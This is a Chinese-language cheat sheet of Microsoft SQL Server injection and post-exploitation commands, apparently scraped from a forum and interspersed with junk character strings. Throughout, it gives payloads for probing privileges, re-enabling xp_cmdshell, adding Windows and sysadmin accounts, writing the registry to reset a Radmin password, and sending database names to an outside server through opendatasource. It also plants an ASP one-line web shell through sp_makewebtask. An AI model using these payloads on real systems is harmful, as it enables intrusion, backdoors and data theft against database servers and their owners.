常用的一些注入命令

admin

//看看是什么权限的
9 i% Y7 E" Z, f! kand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
& O" r5 S9 u. W5 m8 y/ `0 K
- _  w% y6 @  p1 i2 m
( f+ ^' x5 C5 U! c4 N数字类型
# O2 S  r5 h0 b/ O8 C+ F! Vand char(124)%2Buser%2Bchar(124)=0

字符类型
- ~/ L! [! b6 f  c  O6 j6 j' and char(124)%2Buser%2Bchar(124)=0 and ''='

3 M" }# g+ f' x+ ?" |+ v搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

) i& P4 x$ I6 A  Y& V5 z0 A6 X爆用户名
and user>0
' and user>0 and ''='

2 [3 i, L0 Y  y" o3 R检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

$ _( b" [2 O7 i# W- w- U! R% X  r# \检测是不是MSSQL数据库
and exists (select * from sysobjects);--

8 `3 Q9 T* n, i( v! Z7 n检测是否支持多行
;declare @d int;--
; Q( G- E: O. Y/ `+ f" j8 o7 G; B9 {
恢复 xp_cmdshell
5 ~3 m; y+ z8 C$ F5 U7 b& N;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

' p' F+ q1 ?4 Q4 T& Z; ]! D
: O3 a% t, I" ]0 r, M4 Dselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
- l% @2 m) o2 ], b//       执行命令
/ u- S" T' k; Y//-----------------------
首先开启沙盘模式：
0 F7 _$ y0 X8 l8 |5 [% c' V9 L7 F4 aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

7 L' `% q, |0 u1 L6 k% k6 W执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
: ^. q! c, g5 V& l; o  [
, A2 b. u: p! B- l: L" k' i% F判断xp_cmdshell扩展存储过程是否存在：
' }6 z( U- o& j% g. _http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
3 p$ X+ ~6 d$ N
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

/ Y; S* a) y4 c  @/ `REG_SZ

0 w! t# v8 d2 p! {- O8 |0 w7 H* a读注册表
. @2 A7 P* e2 A7 [2 \. \2 ?exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
+ q! e7 |& ]0 J& Z1 W- _
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
( i2 D: E- e5 J* r- w, c

/ ]9 N2 C) a& k数据库备份
backup database pubs to disk = 'c:\123.bak'
$ Q6 @' |7 G$ b( A+ X. O
( Q8 H: X% K' Y: e4 [0 f//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

' y9 ]& o) |$ n

更改sa口令方法：用sql综合利用工具连接后，执行命令：
+ Y+ w, P% m; b' v" }( Eexec sp_password NULL,'新密码','sa'

2 X* g6 C/ a! W$ v- f添加和删除一个SA权限的用户test：
& q8 K) {, a3 |) h# q% pexec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin

0 L) L0 z. x, U. J: e* W9 Z4 ?删除扩展存储过过程xp_cmdshell的语句:
' k0 Z' X' ]- texec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
/ h  q# m5 p8 z" M# p0 IEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
/ T1 {" R9 B. m0 |" W  m& a6 o1 _& HGRANT exec On xp_proxiedadata TO public

$ Z0 @0 }  Q! [
停掉或激活某个服务。

' P) H' t/ j. i. s2 n0 J8 Q5 p" Cexec master..xp_servicecontrol 'stop','schedule'
6 V( B( x: Y8 r/ g* a/ ?exec master..xp_servicecontrol 'start','schedule'

8 [% X1 i- O; a( Q& ?2 K+ R6 Kdbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab
( V) ]- {% p* W! z1 G- C9 T
6 b* Z' x% p2 X3 D3 X: c- e将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

7 t, U! A9 s$ I' h) ]5 A7 o% Wdbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
7 M) P* |  I/ n1 _& d$ c1 D' V, [
& g' F9 `0 z# Vxp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
" O! d1 K8 W0 E. i$ O( z
/ o( c2 `- T. R. n# f, M- jxp_terminate_process 2484

xp_unpackcab
3 {1 T9 a1 J7 ^5 z2 a+ m; ^
1 G# r  I; B/ c- o解开压缩档。

4 S! p3 G2 q( C; V3 w& z& hxp_unpackcab 'c:\test.cab','c:\temp',1

9 t3 k8 m) {: d
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
! ~3 m. ~+ v/ u
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

, F; b4 v6 L: m5 G+ f9 c//得到数据库名
, c: V: r! B7 c" ]* Xinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

2 P0 W6 J' k3 t  C1 @% I4 h9 s( ?
//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
2 g0 [6 s$ p( k) E
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 [! k. D8 `: s9 x2 U: q. A9 h
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
, b# J6 ~4 J+ U
! z$ m2 @4 w, _5 w+ d9 A; l//删除内容
* a* B3 m& F. ?delete from table_name where Stockid = 3